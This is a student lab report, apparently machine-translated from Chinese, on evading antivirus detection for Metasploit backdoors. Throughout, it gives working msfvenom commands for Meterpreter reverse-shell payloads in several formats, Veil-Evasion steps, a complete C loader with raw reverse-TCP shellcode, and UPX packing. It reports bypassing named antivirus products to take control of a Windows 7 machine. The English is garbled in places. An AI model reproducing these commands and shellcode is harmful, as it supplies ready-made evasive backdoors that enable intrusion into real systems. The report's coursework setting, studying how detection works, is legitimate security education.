2019-2020-2 20,175,309 Liu Yuheng "Network Warfare Technology" EXP3 free to kill Principles and Practice

First, the experimental task

(A) Content Experiments

1.1 Method:
Correct Use msf encoder
· msfvenom jar such as generating other document
· Veil
· programming using C + shellcode
· a packer
-class does not describe a method other
1.2 realized by various techniques in combination to kill malicious code Free
1.3 measured with another computer, in the case of soft kill on, and run back to even succeed, kill the soft version marked with the name of the computer

(B) the basics

1. malware detection mechanism
1.1 based on signature detection
Simple signature is for a period of one or more pieces of data. If an executable file (or run other libraries, scripts, etc.) containing such data is considered malicious code.
· AV software vendors do is try to gather the most complete, the latest signature database. Therefore, it is important to update anti-virus software. Outdated signature database is of no use libraries. (Where AV (Anti-virus) refers to malware detection tools that we often say that anti-virus software.)
1.2 heuristic malware detection
· In simple terms, is to infer some one-sided feature. Usually because of the lack of accurate determination basis. The Lord said to malware detection, if a software is usually dry malware do, looks like the malware, then we took it as a malware it. Typical behavior such as connecting a malicious Web site, open ports, modify system files, the typical "look and feel" as the signature file itself, structural, manufacturers and other information. Each manufacturer will define their own detection mode.
· Advantages:
· can detect 0-day malware
* has some versatility
Disadvantages:
Real-time monitoring of system behavior, spending slightly more
· high accuracy is not based on signature-
based detection software acts just 1.3
· initially proposed heuristic when, in general terms but also for scanning feature, means universal, non-accurate scanning multiple features, it is proposed based on later behavior. In theory, behavior-based detection is the equivalent of a heuristic, or is the inclusion of heuristic behavioral surveillance.
2. avoid killing
definition: free to kill is to allow the placement of the back door AV software was not found.
Method:
(1) changing the signature
If your hand only EXE
-packers: encrypted compressed shell shell
· There shellcode (like Meterpreter)
· be encoded with encode
· payload recompiled executable file-based
· Active code
-rewrite recompile (veil-evasion) in other languages
(2) changes in behavior
· Communications
· Try to use rebound connection
use tunneling
encrypted communications data
· operating mode
· memory-based operation
• reduce system modification
· Join confuse the role of the normal function of the code
(3) non-conventional method
application using a flawed as a back door, written in attack the code into the MSF.
• Use social class attack, trick goal off the AV software.
· Handmade a malicious software

Second, the experimental procedures

1. Use correct encoder msf

Generate a coded backdoor
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.95.128 LPORT=5309 -f exe > exp3.exe

• Use VirusTotal to check and found 71 kinds of detection software detected in 56, and poor results.

· That if we try to generate ten times what will happen coded backdoor
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.95.128 LPORT=5309 -f exe > encoded10.exe

· Continue to detect, 57/72, em ...... seems greater probability of being detected?

The other files generated 2.msfvenom jar or the like

· Put another way, generated jar in the form of program
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 x> 20175309jar.jar

· Continue to detect, 20/56, significantly reduced the probability of detection, good results.

· Back to one kind of program php form
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 x> 20175309php.php

· Test Results: 3/59, almost can fool all of the AV, the effect is very good.

· What if the attack end mobile phone? Apk generate a water sample to test how Android? (IOS want to achieve this unlikely)
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 x> 20175309apk.apk

· Detection results of 25/62, the effect is not as good as the first two, but more than the exe type stronger.

3.veil

· Want to use the veil must first installed, the installation is very simple, enter the command sudo apt-get install veil-line installation is ok, by the middle of no brain y, takes a long time, as long as the error does not appear successful.
• Input veilinto the veil (similar to debug), then enter use evasioninto the Veil-Evasion

· Enter use c/meterpreter/rev_tcp.pyto enter the configuration page

• Set rebound connect IP: set LHOST 192.168.95.128
• Set port:set LPORT 5309

· Enter the command generatepath and name generation program, the program saved have been identified out

· Then there is the exciting detection time to see how we engage in strength fee old nose out of the program.

· 46/72? Approximately equal to the white field day, but the probability of generating a directly or decreased than the previous number of gratifying.

4. Programming C + shellcode

· Try our experiments previously used the old routine. Generate shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 -f -c

• Create a file c injected shellcode

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main() 
{ 
    int (*func)() = (int(*)())buf; 
    func(); 
}

• Using the command i686-w64-mingw32-g++ 5309.c -o 5309.exegenerating executable backdoor

· Went to the link detection to see if we changed a new approach and effort spent So how do things out

· Or 46/72? ? ? I feel like I was playing. . .

5. packers tools

· Since these does not work, then we modified virus, give him a protective shell, similar to when the war snipers to hide their worn ghillie suit, like to look forward to stay there check in this way.
• Using the command upx 5309.exe -o 5309pro.exeto the program just generated packers, and named 5309pro.

· The test to see again.

· Although modest upgrade, but at least it worked.

6. Other methods

· Back to one other way to look at how effective.
· Enter the Veil-Evasion, enter listto view the useful load

· Here select the first 32, probably is treated with a virus des algorithm in python environment
Input generategeneration program, and select2：msfvenom

• Press tabto automatically obtain IP payload and keys, enter the port number to yourself.

Enter the file name (here named for hand slipped 6) • After, and continue typing2

• Go to the directory the file is found xxx.py backdoor file has been generated
after · is familiar examined

· This finally heaven pays off, only Microsoft tested out by all the other, the effect is perfect.

7. malicious code implemented by the combination of applying various techniques to avoid killing

• Host environment: win10 antivirus software: computer butler Tencent 13.5
· inject shellcode here to continue to use the technology to produce a new program.
· Packers after treatment.
· Sharing via shared folder to host win10, killing virus
-antivirus software does not detect its presence

8. In the case of soft kill on, and run back to the other computers connected successfully with the measured, indicated to kill the soft name and version of your computer

• Host environment: win7 Enterprise Edition antivirus software: 360 security guards 12
· kali backdoor will lyhnbbe sent to the win7
· enter exploit starts listening, win7 open the program back even
· kali successfully gain control of the win7, win7 there backdoor open in the case of successful evasion of inspection of antivirus software.

Third, experiments thoughts

The greatest feeling is finally able to get out of a backdoor can avoid anti-virus software, and no longer shut down as many obstacles (firewall, antivirus software) as before in order to achieve their desired effect.
But it is clear that their level is very limited, if the next update antivirus software continues to go backdoor we generate will be detected and removed, so learn the skills to make more advanced programs to evade detection antivirus software is our unremitting efforts aims.

Fourth, to answer questions

How to (1) kill soft is detected malicious code?
A: Now is the most widely signature-based detection. If the code matches on this program in a section of code that comes with antivirus software signature library, I think it's malicious code and clear.
The future trend is heuristic detection, anti-virus software, a program under way to judge for themselves behave like malicious software to antivirus, a little taste of artificial intelligence, requires more study. The advantage is to take preventive measures, the disadvantage is easy to killing innocent people.
(2) is free to kill what to do?
A: The use technical means to make illegal anti-virus software program from being detected clear.
(3) basic methods to avoid killing what?
A: changing the signature: shell (shell compression, encryption shell), encoded with encode, based on payload re-compiled executable file will be overwritten recompile (veil-evasion) in another language
change behavior: communication (using rebound connection, tunnel technology, encrypted communications data), the operation mode (memory-based operations, reduce modifications to the system, the normal function of the code to confuse the role of)
the unconventional method: using a vulnerable application as a back door, write attack code as integrated into the MSF, a social worker type of attack, trick goal off the AV software, a hand-built malicious software.
(4) open soft kill can absolutely prevent malicious computer code?
A: Originally thought to the results of this experiment found that anti-virus software can not guarantee one hundred percent prevent malicious code, anti-virus software, after all, also need to gradually improve and upgrade.